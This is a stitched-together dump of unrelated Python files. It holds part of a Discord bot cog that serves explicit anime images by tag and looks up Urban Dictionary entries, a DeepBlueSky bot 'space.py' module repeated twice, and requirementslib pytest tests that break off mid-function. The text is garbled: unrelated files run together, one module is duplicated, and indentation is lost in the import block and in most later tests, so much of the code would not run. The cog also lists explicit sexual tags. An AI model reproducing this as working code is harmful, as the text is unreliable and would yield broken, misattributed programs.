    def __init__(self, bot):
        self.bot = bot
        self.thumbnail = "https://i.imgur.com/ivmKTvu.png"
        # Tag names accepted by the nekos.life v2 image endpoint.
        self.tags = (
            "feet",
            "yuri",
            "trap",
            "futanari",
            "hololewd",
            "lewdkemo",
            "solog",
            "feetg",
            "cum",
            "erokemo",
            "les",
            "wallpaper",
            "lewdk",
            "ngif",
            "meow",
            "tickle",
            "lewd",
            "feed",
            "gecg",
            "eroyuri",
            "eron",
            "cum_jpg",
            "bj",
            "nsfw_neko_gif",
            "solo",
            "kemonomimi",
            "nsfw_avatar",
            "gasm",
            "poke",
            "anal",
            "slap",
            "hentai",
            "avatar",
            "erofeet",
            "holo",
            "keta",
            "blowjob",
            "pussy",
            "tits",
            "holoero",
            "lizard",
            "pussy_jpg",
            "pwankg",
            "classic",
            "kuni",
            "waifu",
            "pat",
            "8ball",
            "kiss",
            "femdom",
            "neko",
            "spank",
            "cuddle",
            "erok",
            "fox_girl",
            "boobs",
            "Random_hentai_gif",
            "smallboobs",
            "hug",
            "ero",
        )

    @nsfw()
    @commands.command(
        name="neko",
        aliases=(
            "catgirl",
            "hentai"
        )
    )
    @commands.cooldown(
        1.0, 5.0, commands.BucketType.user
    )
    async def _neko(self, ctx, *, tag: str.lower = None):
        """
        Gives you random neko picture. Channel must be NSFW to use this command. Leave the tag field empty to randomize neko.
        ---
        Tags are: feet, yuri, trap, futanari, hololewd, lewdkemo, solog, feetg,
        cum, erokemo, les, wallpaper, lewdk, ngif, meow, tickle, lewd, feed, gecg,
        eroyuri, eron, cum_jpg, bj, nsfw_neko_gif, solo, kemonomimi, nsfw_avatar,
        gasm, poke, anal, slap, hentai, avatar, erofeet, holo, keta, blowjob, pussy,
        tits, holoero, lizard, pussy_jpg, pwankg, classic, kuni, waifu, pat, 8ball, kiss,
        femdom, neko, spank, cuddle, erok, fox_girl, boobs, Random_hentai_gif, smallboobs,
        hug, ero
        """
        try:
            if tag is None:
                tag = choice(
                    self.tags
                )
            # The API expects this one tag capitalized.
            if tag == "random_hentai_gif":
                tag = tag.capitalize()
            async with self.bot.session.get(
                f"https://nekos.life/api/v2/img/{tag}"
            ) as resp:
                data = await resp.json()
                embedneko = discord.Embed(
                    color=self.bot.color,
                    title=f"Neko :3 - {tag}",
                    timestamp=ctx.message.created_at,
                )
                embedneko.set_image(url=f'{data.get("url")}')
                embedneko.set_footer(
                    text=f"Requested by: {ctx.author}",
                    icon_url=ctx.author.avatar_url)
                await ctx.send(embed=embedneko)
        except Exception as exc:
            await self.bot.error(
                ctx = ctx,
                exc = exc,
            )

    @nsfw()
    @commands.command(
        aliases=(
            "urb",
            "ud",
            "urban"
        )
    )
    @commands.cooldown(
        1.0, 10.0, commands.BucketType.user
    )
    async def urbandictionary(self, ctx, *, urbanword):
        """
        Looks up for word in Urban Dictionary
        For example, @Astonish ud cat will give you definition and more of word 'cat'
        """
        try:
            async with self.bot.session.get(
                f"http://api.urbandictionary.com/v0/define?term={urbanword}"
            ) as resp:
                data = await resp.json()
            # Probe the first result; self.bot.error reports malformed/empty data.
            try:
                data["list"][0].get("word")
            except Exception as exc:
                await self.bot.error(
                    ctx = ctx,
                    exc = exc,
                )
            else:
                async with self.bot.session.get(
                    f"http://api.urbandictionary.com/v0/define?term={urbanword}"
                ) as resp:
                    data = await resp.json()
                definition = data["list"][0].get("definition")
                example = data["list"][0].get("example")
                # BUG FIX: these were chained with elif, so an empty example
                # was not normalized whenever the definition was also empty.
                # NOTE(review): ``example`` is never rendered below.
                if definition == "":
                    definition = "No definition(s)."
                if example == "":
                    example = "No example(s)."
                try:
                    if len(definition) >= 2000:
                        raise Exception("The definition is too long.")
                    else:
                        embed = discord.Embed(color=self.bot.color)
                        embed.add_field(
                            name="**:baby_bottle: Definition**",
                            value=definition,
                            inline=True,
                        )
                        embed.add_field(
                            name="**:link: Permalink**",
                            value=f'**[➤ Click Me!]({data["list"][0].get("permalink")})**',
                            inline=True,
                        )
                        embed.add_field(
                            name="**:notebook_with_decorative_cover: Word by**",
                            value=f'**{data["list"][0].get("author")}**',
                            inline=True,
                        )
                        embed.add_field(
                            name="**:pen_ballpoint: Written on**",
                            value=f'**{data["list"][0].get("written_on")}**',
                            inline=True,
                        )
                        embed.add_field(
                            name="**:star: Rating**",
                            value=f':thumbsup: **{data["list"][0].get("thumbs_up")}**\n:thumbsdown: **{data["list"][0].get("thumbs_down")}**',
                            inline=True,
                        )
                        embed.set_thumbnail(
                            url=ctx.author.avatar_url,
                        )
                        await ctx.send(
                            embed=embed,
                        )
                except Exception as exc:
                    await ctx.send(
                        f"{self.bot.tick(False)} | **Maybe, the definition is too long**",
                        delete_after=5,
                    )
        except Exception as exc:
            await ctx.send(
                f"{self.bot.tick(False)} | **Error or no results found for your query**",
                delete_after=5,
            )
def setup(bot):
    # Standard discord.py extension entry point: attach the NSFW cog.
    bot.add_cog(NSFW(bot))
|
# space.py
from __future__ import annotations
import abc
import json
import os
import re
import time
from typing import TYPE_CHECKING, Any, Optional
from typing import Dict, FrozenSet, List, OrderedDict
import discord
from .command import Command, CommandAlias, CommandSimple
if TYPE_CHECKING:
from .deepbluesky import DeepBlueSky
class Space(abc.ABC):
    """A conversation scope (DM, group channel, or guild) that owns its own
    persisted properties and custom commands.

    Identity is the string ``space_id`` (``"<type>_<base_id>"``); equality
    and hashing are based on it.
    """
    # pylint: disable=function-redefined
    def __init__(self, client: DeepBlueSky, space_type: str, base_id: int):
        self.client: DeepBlueSky = client
        self.base_id: int = base_id
        self.custom_command_dict: Dict[str, Command] = OrderedDict([])
        self.crtime: int = int(time.time())
        self.mtime: int = int(time.time())
        self.wikitext: Optional[bool] = None
        self.command_prefix: Optional[str] = None
        self.space_type: str = space_type
        self.space_id: str = f'{space_type}_{base_id}'
    def __str__(self) -> str:
        return self.space_id
    def __eq__(self, other) -> bool:
        # NOTE(review): assumes ``other`` is a Space or falsy; comparing with
        # an arbitrary truthy object raises AttributeError -- confirm callers.
        if not other:
            return False
        if id(self) == id(other):
            return True
        return self.space_id == other.space_id
    def __hash__(self) -> int:
        return hash((type(self), self.space_id))
    def get_all_properties(self) -> Dict[str, Any]:
        """Snapshot of the persistable attributes (defaults plus timestamps)."""
        return {attr: getattr(self, attr) for attr in list(self.client.default_properties.keys()) + ['crtime', 'mtime']}
    def save(self, update_mtime: bool = True) -> bool:
        """Persist this space's properties to storage/<space_id>/space.json.

        Returns True on success, False on IOError (which is logged).
        """
        if update_mtime:
            self.mtime = int(time.time())
        space_properties = self.get_all_properties()
        dirname = f'storage/{self.space_id}'
        try:
            os.makedirs(dirname, mode=0o755, exist_ok=True)
            with open(f'{dirname}/space.json', 'w', encoding='UTF-8') as json_file:
                json.dump(space_properties, json_file)
        except IOError:
            self.client.logger.exception(f'Unable to save space: {self.space_id}')
            return False
        return True
    def save_command(self, command_name: str, update_mtime: bool = True) -> bool:
        """Persist (or delete) one custom command's JSON file.

        Writes the command's dict when present in custom_command_dict,
        otherwise removes any stale file. Returns success.
        """
        # NOTE(review): ``update_mtime`` is accepted but unused here.
        dirname=f'storage/{self.space_id}/commands'
        command_json_fname = f'{dirname}/{command_name}.json'
        try:
            os.makedirs(dirname, mode=0o755, exist_ok=True)
            if command_name in self.custom_command_dict:
                command = self.custom_command_dict[command_name]
                command.modification_time = int(time.time())
                with open(command_json_fname, 'w', encoding='UTF-8') as json_file:
                    json.dump(command.get_dict(), json_file)
            elif os.path.isfile(command_json_fname):
                os.remove(command_json_fname)
            return True
        except IOError:
            self.client.logger.exception(f'Unable to save command in space: {self.space_id}')
            return False
    def load_properties(self, property_dict: Dict[str, Any]):
        """Restore persisted properties from a dict, defaulting timestamps."""
        for attr in self.client.default_properties.keys():
            setattr(self, attr, property_dict.get(attr, None))
        # this mangles space_id so we re-set it
        self.space_id = f'{self.space_type}_{self.base_id}'
        for attr in ['crtime', 'mtime']:
            setattr(self, attr, property_dict.get(attr, int(time.time())))
    def load_command(self, command_dict: Dict[str, Any]) -> bool:
        """Reconstruct one custom command from its saved dict.

        Returns False (without adding) when an alias's target is not yet
        known; callers retry via load_commands.
        """
        # python 3.10: use patterns
        # BUG FIX: the f-string below originally nested single quotes inside
        # a single-quoted f-string -- a SyntaxError on Python < 3.12.
        if command_dict['type'] != 'simple' and command_dict['type'] != 'alias':
            msg = f'Invalid custom command type: {command_dict["type"]}'
            self.client.logger.error(msg)
            raise ValueError(msg)
        author = command_dict['author']
        name = command_dict['name']
        crtime = command_dict['crtime']
        mtime = command_dict['mtime']
        value = command_dict['value']
        if command_dict['type'] == 'simple':
            self.custom_command_dict[name] = CommandSimple(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value)
        else:
            # command_type must equal 'alias'
            if value in self.client.builtin_command_dict:
                value = self.client.builtin_command_dict[value]
            elif value in self.custom_command_dict:
                value = self.custom_command_dict[value]
            else:
                self.client.logger.warning(f'cant add alias before its target. name: {name}, value: {value}')
                return False
            self.custom_command_dict[name] = CommandAlias(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value, builtin=False)
        return True
    def load_commands(self, command_dict_list: List[Dict[str, Any]]) -> bool:
        """Load all commands, retrying aliases until a pass adds nothing new.

        Returns False when unresolvable (broken) aliases remain.
        """
        failed_all = False
        commands_to_add = command_dict_list[:]
        while len(commands_to_add) > 0 and not failed_all:
            failed_all = True
            for command_dict in commands_to_add[:]:
                if self.load_command(command_dict):
                    commands_to_add.remove(command_dict)
                    failed_all = False
        if failed_all:
            self.client.logger.error(f'Broken aliases detected in space: {self.space_id}')
        return not failed_all
    async def query_users(self, query: str) -> int:
        """Resolve *query* (numeric ID, mention, or name prefix) to a user ID.

        Returns -1 when no user matches and -2 when the prefix is ambiguous.
        """
        # user ID input
        try:
            user_id = int(query)
            return user_id
        except ValueError:
            pass
        # ping input
        match = re.match(r'^<@!?([0-9]+)>', query)
        if match:
            return int(match.group(1))
        # username input
        user_id = -1
        userlist = await self.get_userlist()
        query = query.lower()
        for user in frozenset({self.client.user}).union(userlist):
            fullname = user.name.lower() + '#' + user.discriminator
            displayname = user.display_name.lower()
            if fullname.startswith(query) or displayname.startswith(query):
                if user_id >= 0:
                    return -2
                user_id = user.id
        return user_id
    @abc.abstractmethod
    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        """Return every user belonging to this space."""
        pass
    @abc.abstractmethod
    def is_moderator(self, user: discord.abc.User) -> bool:
        """Whether *user* may run moderator-only commands here."""
        pass
class DMSpace(Space):
    """A Space backed by a direct-message conversation with one user."""
    def __init__(self, client: DeepBlueSky, base_id: int):
        super().__init__(client=client, space_type='dm', base_id=base_id)
        # Cached DM partner; resolved lazily by get_recipient().
        self.recipient: Optional[discord.User] = None
    async def get_recipient(self) -> discord.User:
        """Return the DM partner, fetching and caching on first use.

        Raises RuntimeError when the user cannot be resolved.
        """
        if self.recipient:
            return self.recipient
        # NOTE(review): unlike GuildSpace.get_guild, this call is not awaited;
        # if get_or_fetch_user is a coroutine this caches a coroutine object
        # -- confirm against DeepBlueSky.
        recipient = self.client.get_or_fetch_user(self.base_id)
        if not recipient:
            msg = f'Cannot find user: {self.base_id}'
            self.client.logger.critical(msg)
            raise RuntimeError(msg)
        self.recipient = recipient
        return self.recipient
    def is_moderator(self, user: discord.abc.User) -> bool:
        # Everyone moderates their own DM.
        return True
    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        return frozenset({await self.get_recipient()})
class ChannelSpace(Space):
    """A Space backed by a Discord group channel."""
    def __init__(self, client: DeepBlueSky, base_id: int):
        super().__init__(client=client, space_type='chan', base_id=base_id)
        # Cached channel; resolved lazily by get_channel().
        self.channel: Optional[discord.GroupChannel] = None
    async def get_channel(self) -> discord.GroupChannel:
        """Return the group channel, fetching and caching on first use.

        Raises RuntimeError when missing or not a GroupChannel.
        """
        if self.channel:
            return self.channel
        # NOTE(review): unlike GuildSpace.get_guild, this call is not awaited;
        # if get_or_fetch_channel is a coroutine this caches a coroutine
        # object -- confirm against DeepBlueSky.
        channel = self.client.get_or_fetch_channel(self.base_id)
        if not channel:
            msg = f'Cannot find channel: {self.base_id}'
            self.client.logger.critical(msg)
            raise RuntimeError(msg)
        if not isinstance(channel, discord.GroupChannel):
            msg = f'Channel is not a GroupChannel: {self.base_id}'
            self.client.logger.critical(msg)
            raise RuntimeError(msg)
        self.channel = channel
        return self.channel
    def is_moderator(self, user: discord.abc.User) -> bool:
        # Every participant moderates a group channel.
        return True
    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        return frozenset((await self.get_channel()).recipients)
class GuildSpace(Space):
    """A Space backed by a Discord guild (server)."""

    def __init__(self, client: DeepBlueSky, base_id: int):
        super().__init__(client=client, space_type='guild', base_id=base_id)
        # Lazily-resolved guild object; populated on first get_guild() call.
        self.guild: Optional[discord.Guild] = None

    async def get_guild(self) -> discord.Guild:
        """Return the cached guild, fetching and caching it on first use.

        Raises RuntimeError when the guild cannot be resolved.
        """
        if not self.guild:
            fetched = await self.client.get_or_fetch_guild(self.base_id)
            if not fetched:
                msg = f'Cannot find guild: {self.base_id}'
                self.client.logger.critical(msg)
                raise RuntimeError(msg)
            self.guild = fetched
        return self.guild

    def is_moderator(self, user: discord.abc.User) -> bool:
        """Moderators are members with the kick-members permission."""
        return hasattr(user, 'guild_permissions') and user.guild_permissions.kick_members

    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        return frozenset((await self.get_guild()).members)
| # space.py
from __future__ import annotations
import abc
import json
import os
import re
import time
from typing import TYPE_CHECKING, Any, Optional
from typing import Dict, FrozenSet, List, OrderedDict
import discord
from .command import Command, CommandAlias, CommandSimple
if TYPE_CHECKING:
from .deepbluesky import DeepBlueSky
class Space(abc.ABC):
    """A conversation scope (DM, group channel, or guild) that owns its own
    persisted properties and custom commands.

    Identity is the string ``space_id`` (``"<type>_<base_id>"``); equality
    and hashing are based on it.
    """
    # pylint: disable=function-redefined
    def __init__(self, client: DeepBlueSky, space_type: str, base_id: int):
        self.client: DeepBlueSky = client
        self.base_id: int = base_id
        self.custom_command_dict: Dict[str, Command] = OrderedDict([])
        self.crtime: int = int(time.time())
        self.mtime: int = int(time.time())
        self.wikitext: Optional[bool] = None
        self.command_prefix: Optional[str] = None
        self.space_type: str = space_type
        self.space_id: str = f'{space_type}_{base_id}'
    def __str__(self) -> str:
        return self.space_id
    def __eq__(self, other) -> bool:
        # NOTE(review): assumes ``other`` is a Space or falsy; comparing with
        # an arbitrary truthy object raises AttributeError -- confirm callers.
        if not other:
            return False
        if id(self) == id(other):
            return True
        return self.space_id == other.space_id
    def __hash__(self) -> int:
        return hash((type(self), self.space_id))
    def get_all_properties(self) -> Dict[str, Any]:
        """Snapshot of the persistable attributes (defaults plus timestamps)."""
        return {attr: getattr(self, attr) for attr in list(self.client.default_properties.keys()) + ['crtime', 'mtime']}
    def save(self, update_mtime: bool = True) -> bool:
        """Persist this space's properties to storage/<space_id>/space.json.

        Returns True on success, False on IOError (which is logged).
        """
        if update_mtime:
            self.mtime = int(time.time())
        space_properties = self.get_all_properties()
        dirname = f'storage/{self.space_id}'
        try:
            os.makedirs(dirname, mode=0o755, exist_ok=True)
            with open(f'{dirname}/space.json', 'w', encoding='UTF-8') as json_file:
                json.dump(space_properties, json_file)
        except IOError:
            self.client.logger.exception(f'Unable to save space: {self.space_id}')
            return False
        return True
    def save_command(self, command_name: str, update_mtime: bool = True) -> bool:
        """Persist (or delete) one custom command's JSON file.

        Writes the command's dict when present in custom_command_dict,
        otherwise removes any stale file. Returns success.
        """
        # NOTE(review): ``update_mtime`` is accepted but unused here.
        dirname=f'storage/{self.space_id}/commands'
        command_json_fname = f'{dirname}/{command_name}.json'
        try:
            os.makedirs(dirname, mode=0o755, exist_ok=True)
            if command_name in self.custom_command_dict:
                command = self.custom_command_dict[command_name]
                command.modification_time = int(time.time())
                with open(command_json_fname, 'w', encoding='UTF-8') as json_file:
                    json.dump(command.get_dict(), json_file)
            elif os.path.isfile(command_json_fname):
                os.remove(command_json_fname)
            return True
        except IOError:
            self.client.logger.exception(f'Unable to save command in space: {self.space_id}')
            return False
    def load_properties(self, property_dict: Dict[str, Any]):
        """Restore persisted properties from a dict, defaulting timestamps."""
        for attr in self.client.default_properties.keys():
            setattr(self, attr, property_dict.get(attr, None))
        # this mangles space_id so we re-set it
        self.space_id = f'{self.space_type}_{self.base_id}'
        for attr in ['crtime', 'mtime']:
            setattr(self, attr, property_dict.get(attr, int(time.time())))
    def load_command(self, command_dict: Dict[str, Any]) -> bool:
        """Reconstruct one custom command from its saved dict.

        Returns False (without adding) when an alias's target is not yet
        known; callers retry via load_commands.
        """
        # python 3.10: use patterns
        if command_dict['type'] != 'simple' and command_dict['type'] != 'alias':
            msg = f'Invalid custom command type: {command_dict["type"]}'
            self.client.logger.error(msg)
            raise ValueError(msg)
        author = command_dict['author']
        name = command_dict['name']
        crtime = command_dict['crtime']
        mtime = command_dict['mtime']
        value = command_dict['value']
        if command_dict['type'] == 'simple':
            self.custom_command_dict[name] = CommandSimple(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value)
        else:
            # command_type must equal 'alias'
            if value in self.client.builtin_command_dict:
                value = self.client.builtin_command_dict[value]
            elif value in self.custom_command_dict:
                value = self.custom_command_dict[value]
            else:
                self.client.logger.warning(f'cant add alias before its target. name: {name}, value: {value}')
                return False
            self.custom_command_dict[name] = CommandAlias(name=name, author=author, creation_time=crtime, modification_time=mtime, value=value, builtin=False)
        return True
    def load_commands(self, command_dict_list: List[Dict[str, Any]]) -> bool:
        """Load all commands, retrying aliases until a pass adds nothing new.

        Returns False when unresolvable (broken) aliases remain.
        """
        failed_all = False
        commands_to_add = command_dict_list[:]
        while len(commands_to_add) > 0 and not failed_all:
            failed_all = True
            for command_dict in commands_to_add[:]:
                if self.load_command(command_dict):
                    commands_to_add.remove(command_dict)
                    failed_all = False
        if failed_all:
            self.client.logger.error(f'Broken aliases detected in space: {self.space_id}')
        return not failed_all
    async def query_users(self, query: str) -> int:
        """Resolve *query* (numeric ID, mention, or name prefix) to a user ID.

        Returns -1 when no user matches and -2 when the prefix is ambiguous.
        """
        # user ID input
        try:
            user_id = int(query)
            return user_id
        except ValueError:
            pass
        # ping input
        match = re.match(r'^<@!?([0-9]+)>', query)
        if match:
            return int(match.group(1))
        # username input
        user_id = -1
        userlist = await self.get_userlist()
        query = query.lower()
        for user in frozenset({self.client.user}).union(userlist):
            fullname = user.name.lower() + '#' + user.discriminator
            displayname = user.display_name.lower()
            if fullname.startswith(query) or displayname.startswith(query):
                if user_id >= 0:
                    return -2
                user_id = user.id
        return user_id
    @abc.abstractmethod
    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        """Return every user belonging to this space."""
        pass
    @abc.abstractmethod
    def is_moderator(self, user: discord.abc.User) -> bool:
        """Whether *user* may run moderator-only commands here."""
        pass
class DMSpace(Space):
    """A Space backed by a direct-message conversation with one user."""
    def __init__(self, client: DeepBlueSky, base_id: int):
        super().__init__(client=client, space_type='dm', base_id=base_id)
        # Cached DM partner; resolved lazily by get_recipient().
        self.recipient: Optional[discord.User] = None
    async def get_recipient(self) -> discord.User:
        """Return the DM partner, fetching and caching on first use.

        Raises RuntimeError when the user cannot be resolved.
        """
        if self.recipient:
            return self.recipient
        # NOTE(review): unlike GuildSpace.get_guild, this call is not awaited;
        # if get_or_fetch_user is a coroutine this caches a coroutine object
        # -- confirm against DeepBlueSky.
        recipient = self.client.get_or_fetch_user(self.base_id)
        if not recipient:
            msg = f'Cannot find user: {self.base_id}'
            self.client.logger.critical(msg)
            raise RuntimeError(msg)
        self.recipient = recipient
        return self.recipient
    def is_moderator(self, user: discord.abc.User) -> bool:
        # Everyone moderates their own DM.
        return True
    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        return frozenset({await self.get_recipient()})
class ChannelSpace(Space):
    """A Space backed by a Discord group channel."""
    def __init__(self, client: DeepBlueSky, base_id: int):
        super().__init__(client=client, space_type='chan', base_id=base_id)
        # Cached channel; resolved lazily by get_channel().
        self.channel: Optional[discord.GroupChannel] = None
    async def get_channel(self) -> discord.GroupChannel:
        """Return the group channel, fetching and caching on first use.

        Raises RuntimeError when missing or not a GroupChannel.
        """
        if self.channel:
            return self.channel
        # NOTE(review): unlike GuildSpace.get_guild, this call is not awaited;
        # if get_or_fetch_channel is a coroutine this caches a coroutine
        # object -- confirm against DeepBlueSky.
        channel = self.client.get_or_fetch_channel(self.base_id)
        if not channel:
            msg = f'Cannot find channel: {self.base_id}'
            self.client.logger.critical(msg)
            raise RuntimeError(msg)
        if not isinstance(channel, discord.GroupChannel):
            msg = f'Channel is not a GroupChannel: {self.base_id}'
            self.client.logger.critical(msg)
            raise RuntimeError(msg)
        self.channel = channel
        return self.channel
    def is_moderator(self, user: discord.abc.User) -> bool:
        # Every participant moderates a group channel.
        return True
    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        return frozenset((await self.get_channel()).recipients)
class GuildSpace(Space):
    """A Space backed by a Discord guild (server)."""

    def __init__(self, client: DeepBlueSky, base_id: int):
        super().__init__(client=client, space_type='guild', base_id=base_id)
        # Lazily-resolved guild object; populated on first get_guild() call.
        self.guild: Optional[discord.Guild] = None

    async def get_guild(self) -> discord.Guild:
        """Return the cached guild, fetching and caching it on first use.

        Raises RuntimeError when the guild cannot be resolved.
        """
        if not self.guild:
            fetched = await self.client.get_or_fetch_guild(self.base_id)
            if not fetched:
                msg = f'Cannot find guild: {self.base_id}'
                self.client.logger.critical(msg)
                raise RuntimeError(msg)
            self.guild = fetched
        return self.guild

    def is_moderator(self, user: discord.abc.User) -> bool:
        """Moderators are members with the kick-members permission."""
        return hasattr(user, 'guild_permissions') and user.guild_permissions.kick_members

    async def get_userlist(self) -> FrozenSet[discord.abc.User]:
        return frozenset((await self.get_guild()).members)
|
# -*- coding=utf-8 -*-
import os
import shutil
import pytest
import vistir
from requirementslib.models.requirements import Requirement
from requirementslib.models.setup_info import ast_parse_setup_py
@pytest.mark.skipif(os.name == "nt", reason="Building this is broken on windows")
@pytest.mark.parametrize(
    "test_artifact",
    [
        {"name": "environ_config", "as_artifact": False},
        {"name": "environ_config", "as_artifact": True},
    ],
    indirect=True,
)
def test_local_req(test_artifact):
    """Parse a local artifact path and verify its name and requirements."""
    req = Requirement.from_line(test_artifact.as_posix())
    assert req.name.replace("_", "-") == "environ-config"
    requires = req.req.setup_info.as_dict().get("requires")
    assert sorted(requires.keys()) == ["attrs"]
@pytest.mark.parametrize(
    "url_line, name, requires",
    [
        [
            "https://github.com/requests/requests/archive/v2.20.1.zip",
            "requests",
            ["urllib3", "chardet", "certifi", "idna"],
        ],
        [
            "https://github.com/dropbox/pyannotate/archive/v1.0.4.zip",
            "pyannotate",
            ["six", "mypy-extensions", "typing"],
        ],
    ],
)
@pytest.mark.needs_internet
def test_remote_req(url_line, name, requires):
    """Parse a remote archive URL and verify name and install requirements."""
    req = Requirement.from_line(url_line)
    assert req.name == name
    parsed = req.req.setup_info.as_dict()
    assert sorted(parsed.get("requires").keys()) == sorted(requires)
@pytest.mark.parametrize(
    "url_line, name",
    [
        [
            "https://github.com/matteius/test-project/archive/refs/tags/1.0.0.zip#egg=test_project&subdirectory=parent_folder/pep508-package",
            "test_project",
        ],
    ],
)
@pytest.mark.needs_internet
def test_remote_source_in_subdirectory(url_line, name):
    """A zip URL with a subdirectory fragment resolves the nested package."""
    req = Requirement.from_line(url_line)
    assert req.name == name
    info = req.req.setup_info.as_dict()
    print(info)
    assert info.get("name") == "pep508_package"
    assert info.get("version") == "1.0.0"
    expected = sorted(["sibling-package", "six"])
    assert sorted(info.get("requires").keys()) == expected
def test_no_duplicate_egg_info():
    """When the package has 'src' directory, do not write egg-info in base
    dir."""
    base_dir = vistir.compat.Path(os.path.abspath(os.getcwd())).as_posix()
    r = Requirement.from_line("-e {}".format(base_dir))
    egg_info_name = "{}.egg-info".format(r.name.replace("-", "_"))
    distinfo_name = "{0}.dist-info".format(r.name.replace("-", "_"))
    def find_metadata(path):
        # Locate a metadata entry under *path*: prefer the exact
        # egg-info/dist-info directory, else any entry with a metadata suffix.
        metadata_names = [
            os.path.join(path, name) for name in (egg_info_name, distinfo_name)
        ]
        if not os.path.isdir(path):
            return None
        pth = next(iter(pth for pth in metadata_names if os.path.isdir(pth)), None)
        if not pth:
            pth = next(
                iter(
                    pth
                    for pth in os.listdir(path)
                    if any(
                        pth.endswith(md_ending)
                        for md_ending in [".egg-info", ".dist-info", ".whl"]
                    )
                ),
                None,
            )
        return pth
    # Neither the project root nor the src layout dir may hold metadata yet.
    assert not find_metadata(base_dir)
    assert not find_metadata(os.path.join(base_dir, "src", "reqlib-metadata"))
    assert r.req.setup_info and os.path.isdir(r.req.setup_info.egg_base)
    setup_info = r.req.setup_info
    setup_info.get_info()
    # Metadata must have been generated out-of-tree (egg_base or build dir).
    assert (
        find_metadata(setup_info.egg_base)
        or find_metadata(setup_info.extra_kwargs["build_dir"])
        or setup_info.get_egg_metadata()
    )
@pytest.mark.needs_internet
def test_without_extras(pathlib_tmpdir):
"""Tests a setup.py or setup.cfg parse when extras returns None for some
files."""
setup_dir = pathlib_tmpdir.joinpath("sanitized-package")
setup_dir.mkdir()
assert setup_dir.is_dir()
setup_py = setup_dir.joinpath("setup.py")
setup_py.write_text(
"""
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="sanitized-package",
version="0.0.1",
install_requires=["raven==5.32.0"],
extras_require={
'PDF': ["socks"]
}
)
""".strip()
)
setup_dict = None
with vistir.contextmanagers.cd(setup_dir.as_posix()):
pipfile_entry = {
"path": os.path.abspath(os.curdir),
"editable": True,
"extras": ["socks"],
}
r = Requirement.from_pipfile("e1839a8", pipfile_entry)
r.run_requires()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == ["raven"]
@pytest.mark.parametrize(
"setup_py_name, extras, dependencies",
[
(
"package_with_multiple_extras",
["testing", "dev"],
["coverage", "flaky", "invoke", "parver", "six", "vistir", "wheel"],
),
("package_with_one_extra", ["testing"], ["coverage", "flaky", "six"]),
],
)
def test_extras(pathlib_tmpdir, setup_py_dir, setup_py_name, extras, dependencies):
"""Test named extras as a dependency."""
setup_dir = pathlib_tmpdir.joinpath("test_package")
shutil.copytree(setup_py_dir.joinpath(setup_py_name).as_posix(), setup_dir.as_posix())
assert setup_dir.is_dir()
pipfile_entry = {
"path": "./{0}".format(setup_dir.name),
"extras": extras,
"editable": True,
}
setup_dict = None
with vistir.contextmanagers.cd(pathlib_tmpdir.as_posix()):
r = Requirement.from_pipfile("test-package", pipfile_entry)
assert r.name == "test-package"
r.req.setup_info.get_info()
setup_dict = r.req.setup_info.as_dict()
assert sorted(list(setup_dict.get("requires").keys())) == dependencies
def test_ast_parser_finds_variables(setup_py_dir):
target = setup_py_dir.joinpath("package_with_extras_as_variable/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_finds_fully_qualified_setup(setup_py_dir):
target = setup_py_dir.joinpath(
"package_using_fully_qualified_setuptools/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = {
"name": "test_package",
"version": "1.0.0",
"install_requires": ["six"],
"extras_require": {"testing": ["coverage", "flaky"]},
}
for k, v in expected.items():
assert k in parsed
if isinstance(v, bool):
assert str(parsed[k]) == str(v), parsed[k]
else:
assert parsed[k] == v, parsed[k]
def test_ast_parser_handles_binops(setup_py_dir):
target = setup_py_dir.joinpath(
"package_with_conditional_install_requires/setup.py"
).as_posix()
parsed = ast_parse_setup_py(target)
expected = [
"azure-common>=1.1.5",
"cryptography",
"python-dateutil",
"requests",
]
assert list(sorted(parsed["install_requires"])) == list(sorted(expected))
def test_ast_parser_handles_binops_alternate(setup_py_dir):
target = setup_py_dir.joinpath("package_with_setup_from_dict/setup.py").as_posix()
parsed = ast_parse_setup_py(target)
assert parsed["name"] == "test package"
assert parsed["version"] == "1.0.0"
expected = [
"pytest",
"flake8",
]
assert list(sorted(parsed["extras_require"]["tests"])) == list(sorted(expected))
def test_parse_function_call_as_name(setup_py_dir, pathlib_tmpdir):
package_dir = pathlib_tmpdir.joinpath("package_with_function_call_as_name").as_posix()
setup_dir = setup_py_dir.joinpath("package_with_function_call_as_name").as_posix()
shutil.copytree(setup_dir, package_dir)
req = Requirement.from_line("-e {}".format(package_dir))
assert req.name == "package-with-function-call-as-name"
def test_ast_parser_handles_repeated_assignments(setup_py_dir):
target = (
setup_py_dir.joinpath("package_with_repeated_assignments").absolute().as_posix()
)
r = Requirement.from_line(target)
setup_dict = r.req.setup_info.as_dict()
assert setup_dict["name"] == "test-package-with-repeated-assignments"
assert sorted(setup_dict["requires"]) == ["six"]
def test_ast_parser_handles_exceptions(artifact_dir):
path = artifact_dir.joinpath("git/pyinstaller")
r = Requirement.from_line(path.as_posix())
setup_dict = r.req.setup_info.as_dict()
assert "altgraph" in setup_dict["requires"]
def test_ast_parser_handles_annoted_assignments(setup_py_dir):
parsed = ast_parse_setup_py(
setup_py_dir.joinpath("package_with_annoted_assignments/setup.py").as_posix()
)
assert parsed["extras_require"] == {"docs": ["sphinx", "sphinx-argparse"]}
def test_read_requirements_with_list_comp(setup_py_dir):
req = Requirement.from_line(
f"-e {(setup_py_dir / "package_with_setup_with_list_comp").as_posix()}"
)
setup_info = req.req.setup_info.as_dict()
assert sorted(setup_info["requires"]) == ["requests"]
def test_ast_parse_from_dict_with_name(setup_py_dir):
parsed = ast_parse_setup_py(
